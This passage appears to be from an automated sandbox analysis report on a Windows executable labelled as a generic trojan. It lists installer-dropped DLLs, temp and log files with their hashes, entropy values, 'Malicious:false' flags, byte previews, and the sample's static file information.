                                                                                                                                                                      SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSI74BB.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):570784
                                                                                                                                                                      Entropy (8bit):6.450187144191945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                                                                                                                                      MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                                                                                                                                      SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                                                                                                                                      SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                                                                                                                                      SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSI750A.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):722336
                                                                                                                                                                      Entropy (8bit):6.433567465029135
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:xZCGkZjiIiS4fZrmrRahiyN+bqpoMU0Z/4CwwEjD4JyVzIXyJe55EL96RgO5uh:xBkZVI+ep5U2fvEjD4wzIXX5EL96RX5u
                                                                                                                                                                      MD5:F7B1DDC86CD51E3391AA8BF4BE48D994
                                                                                                                                                                      SHA1:A0C0A4A77991D7F8DF722ACDD782310A6DA2A904
                                                                                                                                                                      SHA-256:AC2DF3283D65AB78CA399232FA090764636E0FEC7AB53BE28F6EE93733D8787F
                                                                                                                                                                      SHA-512:F853C3CF9EC175E946DD42F7F35D130F4FB941F64BBF5780CE452FE6E87459217B80872DB375AD1BBAFC47AD263408E4222D81F62C7DF92C77E23E77E67E6FA6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......m..D)...)...).......$...........f...8...f...1.......0...f...t.......(.......>...)...F.......a.......(.....*.(...).B.(.......(...Rich)...........................PE..L.....c.........."!..."..................................................... ......q.....@.........................@M......\N..........h................#.......o..8@..p....................@..........@....................K..@....................text...|........................... ..`.rdata..Bb.......d..................@..@.data....'...p.......V..............@....rsrc...h............l..............@..@.reloc...o.......p...r..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSI76B1.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3918
                                                                                                                                                                      Entropy (8bit):6.891537366624384
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:5Y1TcDRT47TyAWlyfvnVhJ/07oB4fxBBujlhrSxKEvwOT8W:5Y1cDR8/DgMH00Kfx7kHrSxKK8W
                                                                                                                                                                      MD5:459DAF3A4803C18594A13FE32AD7705C
                                                                                                                                                                      SHA1:5984F1907B1F74879F72A687FF5457233776062E
                                                                                                                                                                      SHA-256:A7F477BDEB7EAAB934E414FAF135A63FE1A8F6F427D041E32B76C71C57EEB67B
                                                                                                                                                                      SHA-512:6EA3C6B755E1E217CD55030C4DC3F3458797724CB23EED2435056661C6EA4E5BE020BE56E641DE33C04035392C8322D39C4708B0871331CF295DA9882F4EB83F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...@IXOS.@.....@j..W.@.....@.....@.....@.....@.....@......&.{8415BADB-0228-466E-A597-68F06CD8880C}..Helper..Helper.msi.@.....@.....@.....@........&.{3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}.....@.....@.....@.....@.......@.....@.....@.......@......Helper......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{1DAA5F1C-35AF-4DBC-BCD3-B8B55A5E6DC0}9.C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\.@.......@.....@.....@......&.{96C4647E-D5A3-492E-A70C-151AAE336B85}..01:\Software\Helper Company LLC\Helper\Version.@.......@.....@.....@......&.{E50D5DA2-61B1-4DD4-BD53-57A21481EBCF}d.01:\Software\Caphyon\Advanced Installer\LZMA\{8415BADB-0228-466E-A597-68F06CD8880C}\1.0.0\AI_ExePath.@.......@.....@.....@......&.{2E55D07B-CAEF-4B54-92D8-F9199243F537}G.C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exe.@.......@.....@.....@......&.{1DD84FFF-FB0

                                                                                                                                                                      C:\Windows\Installer\MSI76F0.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):634784
                                                                                                                                                                      Entropy (8bit):6.564827321629019
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:LXRXK9pUYawEtwPoypH29aXglK2FVL114sfUozUyMotjUPGDVeIfv:zJKHEtH7awlK2FV511fprxtjUPkVeIfv
                                                                                                                                                                      MD5:A619F980C1BAA155F7CFB79553AA10B1
                                                                                                                                                                      SHA1:DA4DCAEC351309B00D024ADB704DD61230E68F81
                                                                                                                                                                      SHA-256:A0ACE6862AC97CDCA53A9458B57901A8FE3DB546A4EA4D5BC3D05E7C119418A7
                                                                                                                                                                      SHA-512:983C44376DCBAB6855F6F474AA3BFB672D0ADAB63A38096FAE33DA80F585DA8F881A9AE352EDFE80ED3CD424E42B45FB8AA7CC27337925241844B03EE300E7D9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T18Y.PV..PV..PV.."U..PV.."S..PV.."R..PV._,R..PV._,U..PV._,S.KPV.."W..PV..PW..QV..,_.!PV..,V..PV..,...PV..P...PV..,T..PV.Rich.PV.................PE..L.....c.........."!...".&...v......oo.......@...........................................@.................................L........`...................#...p...Y...R..p...................@S.......R..@............@...............................text...x$.......&.................. ..`.rdata..B....@.......*..............@..@.data........0......................@....rsrc........`.......,..............@..@.reloc...Y...p...Z...2..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\SourceHash{8415BADB-0228-466E-A597-68F06CD8880C}

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.2007303511197318
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:JSbX72FjTXAlfLIlHuRp1hG7777777777777777777777777ZDHF0buM1MQ7tWOK:JdUIwI6FzcO2tFF
                                                                                                                                                                      MD5:A117EF4F4DCA8C613B5F61CA997F487A
                                                                                                                                                                      SHA1:5734E3C9A7A8EE9B14BAA53F76F8B4D519866D88
                                                                                                                                                                      SHA-256:B8C4193786C7A769A89F8A6477C2822CF0B5D200710789BC96A1365BEC057CFC
                                                                                                                                                                      SHA-512:BC9BDFD80FA33ECA600B65E3F070FF9D2B8D6E210C78FE1D1E737E591C5F8E86FCC57B7AAEF029D9CEB0C681154D6A63AAA0D6A6EEC69D99BDF847B98183C3B4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.6890805040630776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:v8PhGuRc06WX4cnT5NQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:uhG1snT4bwqtnkCrswx
                                                                                                                                                                      MD5:8E06133FE2432E2462CA0A844D3D2B8D
                                                                                                                                                                      SHA1:044F29BD04BCEC690323E08CA70D094D5684AE3F
                                                                                                                                                                      SHA-256:48E746A1FFD2A1E79E9E57EEF48E15D55E5BD4166AD7C483FDE053C220FDF76D
                                                                                                                                                                      SHA-512:7285BE032316005F952F71190AC76BBFCC900CD7EB3D9DAB15185FCE3E32D457C29260E6153721C3B6E81298785108D0DE17BEFCB57D59C6FDD3478925A2D6F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):404314
                                                                                                                                                                      Entropy (8bit):5.400357729242869
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bFg:i0LVlABOYCe6+K
                                                                                                                                                                      MD5:D574EB68889B115580C7BC0DDE92A52D
                                                                                                                                                                      SHA1:01CFA428024A503D1754C4DAFFF2594473B4FD60
                                                                                                                                                                      SHA-256:6D5CD0EE4962F30F6A966061C479A942A3DAA06E2C93387CB70152F1E197A6CD
                                                                                                                                                                      SHA-512:246BCCBD642FB739C6292ADCE7A8EA560899681D3718585B05DC311E930AFAD94BE8FC2E8D3B681D18E9390D0F62679BB2E0FA27DEEFC1A02156B4E053100F96
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N

                                                                                                                                                                      C:\Windows\Temp\~DF07A35AE69FE0469E.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DF0F839394D367DE55.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.6890805040630776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:v8PhGuRc06WX4cnT5NQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:uhG1snT4bwqtnkCrswx
                                                                                                                                                                      MD5:8E06133FE2432E2462CA0A844D3D2B8D
                                                                                                                                                                      SHA1:044F29BD04BCEC690323E08CA70D094D5684AE3F
                                                                                                                                                                      SHA-256:48E746A1FFD2A1E79E9E57EEF48E15D55E5BD4166AD7C483FDE053C220FDF76D
                                                                                                                                                                      SHA-512:7285BE032316005F952F71190AC76BBFCC900CD7EB3D9DAB15185FCE3E32D457C29260E6153721C3B6E81298785108D0DE17BEFCB57D59C6FDD3478925A2D6F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DF288513D8142572B5.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):1.3441020181505743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:4xOuHvhPIFX4zT53DJQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:wOOIwT5ebwqtnkCrswx
                                                                                                                                                                      MD5:3B363EF691FE4A1A250A5524B6FFCA11
                                                                                                                                                                      SHA1:8D498C1CBC4805768E034AA4ABAFB3EC88751328
                                                                                                                                                                      SHA-256:FA9D2E86266999003D34B02FC618FA0CEDC1ED6A204AE655D7F72CB10943D865
                                                                                                                                                                      SHA-512:5A36E860E72825314804A2532CDA6C940BE1F966DA46CB1397056D773E863EB7DBB7F39C88794CEC8C7428939E74C24BF222D70892BA3CD53D894B0C9D28A2D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DF3A71CF87B1DD1BEA.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):0.09732975350377866
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKO0bu9xsZpiMtsW0FQT8KEojytOby4lSVky6lWf1:50i8n0itFzDHF0buM1MQ7tWObdzWd
                                                                                                                                                                      MD5:017120DE836CF251613B70DAE84B5F64
                                                                                                                                                                      SHA1:FBE863C57273C0AFC9427C67148D34CFD57E75B5
                                                                                                                                                                      SHA-256:CD3FD6AA4710FCE6FF0B55B9C744E9252DBD5896D604D8A50658AFDE2E022051
                                                                                                                                                                      SHA-512:800D3C9890BCE9F0A96469FB63CD8FAA46FBDC79A24AC0F43AB3A2713F7F6FC5A6F9A91F4B790F8B762AF5D35D3B330C50F341625D75F8477FBE68934F130461
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DF5B37CA93683D28DD.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.6890805040630776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:v8PhGuRc06WX4cnT5NQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:uhG1snT4bwqtnkCrswx
                                                                                                                                                                      MD5:8E06133FE2432E2462CA0A844D3D2B8D
                                                                                                                                                                      SHA1:044F29BD04BCEC690323E08CA70D094D5684AE3F
                                                                                                                                                                      SHA-256:48E746A1FFD2A1E79E9E57EEF48E15D55E5BD4166AD7C483FDE053C220FDF76D
                                                                                                                                                                      SHA-512:7285BE032316005F952F71190AC76BBFCC900CD7EB3D9DAB15185FCE3E32D457C29260E6153721C3B6E81298785108D0DE17BEFCB57D59C6FDD3478925A2D6F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DF6724555BF40F785B.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DF827B886033DF4169.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DFA12821DCF0D4BE88.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DFBF55E71ABCFB6257.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):1.3441020181505743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:4xOuHvhPIFX4zT53DJQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:wOOIwT5ebwqtnkCrswx
                                                                                                                                                                      MD5:3B363EF691FE4A1A250A5524B6FFCA11
                                                                                                                                                                      SHA1:8D498C1CBC4805768E034AA4ABAFB3EC88751328
                                                                                                                                                                      SHA-256:FA9D2E86266999003D34B02FC618FA0CEDC1ED6A204AE655D7F72CB10943D865
                                                                                                                                                                      SHA-512:5A36E860E72825314804A2532CDA6C940BE1F966DA46CB1397056D773E863EB7DBB7F39C88794CEC8C7428939E74C24BF222D70892BA3CD53D894B0C9D28A2D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DFC9253B5509296B43.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):73728
                                                                                                                                                                      Entropy (8bit):0.18410240466212366
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:hyRT2QxSKQYQs/HDDWSKQi/HDD8AEKgCykVFDVYzknb9Q:hyJqtnkCrsAb
                                                                                                                                                                      MD5:BF7CF365BF24786565D5CF97A83D0BF0
                                                                                                                                                                      SHA1:0E06119D950BB2B3CDC04242D210FE89503AC817
                                                                                                                                                                      SHA-256:5192CAB04CD31A1881587CCA3DA5245D5E9DA797B3810E43E1C3969955FA2331
                                                                                                                                                                      SHA-512:C06980AB040D4CEB4A4EA635072F4A07DB770E8D67CB9EAE651C11FA01F5D28BDE503E454CE873B7F9E9AFBF99E54666E6B78CD32461613C6E95E7CD85894340
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DFE38A3DFA00980A4A.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Temp\~DFF85DEB535C9A4EE9.TMP

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):1.3441020181505743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:4xOuHvhPIFX4zT53DJQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:wOOIwT5ebwqtnkCrswx
                                                                                                                                                                      MD5:3B363EF691FE4A1A250A5524B6FFCA11
                                                                                                                                                                      SHA1:8D498C1CBC4805768E034AA4ABAFB3EC88751328
                                                                                                                                                                      SHA-256:FA9D2E86266999003D34B02FC618FA0CEDC1ED6A204AE655D7F72CB10943D865
                                                                                                                                                                      SHA-512:5A36E860E72825314804A2532CDA6C940BE1F966DA46CB1397056D773E863EB7DBB7F39C88794CEC8C7428939E74C24BF222D70892BA3CD53D894B0C9D28A2D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):6.993502133196768
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.81%
                                                                                                                                                                      • Windows ActiveX control (116523/4) 1.15%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File size:7'465'048 bytes
                                                                                                                                                                      MD5:19124312cafa0b1c5524329755a5d6a2
                                                                                                                                                                      SHA1:ccd8c01b210b26cd708a3e4cc49de45fed9abac1
                                                                                                                                                                      SHA256:0190e867668e9be091e3d52261b62ef9b65059565ec17168813f82e7693af2fd
                                                                                                                                                                      SHA512:4ffea24d0c03281afb06a23424e0a22a4407d7ce7fb80462aa8f9fa6adf4b33d5cd6e3f72943f6a1ca21cb26395922ded207605b5e95b04e9f3bd65443d98b9b
                                                                                                                                                                      SSDEEP:98304:Uw5gk9MwZAN5CWj5QrOZAzojo6VE3re7a6fXG44ngx5fVD2InA:H5gk9KH9q4SKaSG44nUtyIA
                                                                                                                                                                      TLSH:02769D217286C43BD56A01B1692CDA9F5228BF720B7154D7B3DC3E3F5AB48C21636E27
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..j#..9#..9#..9...8...9...8...9...8"..9l..80..9l..8:..9l..8J..9...89..9...8 ..9...8"..9#..9...9...8[..9..}9"..9#..9"..9...8"..

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:b8868baba9aba2d8

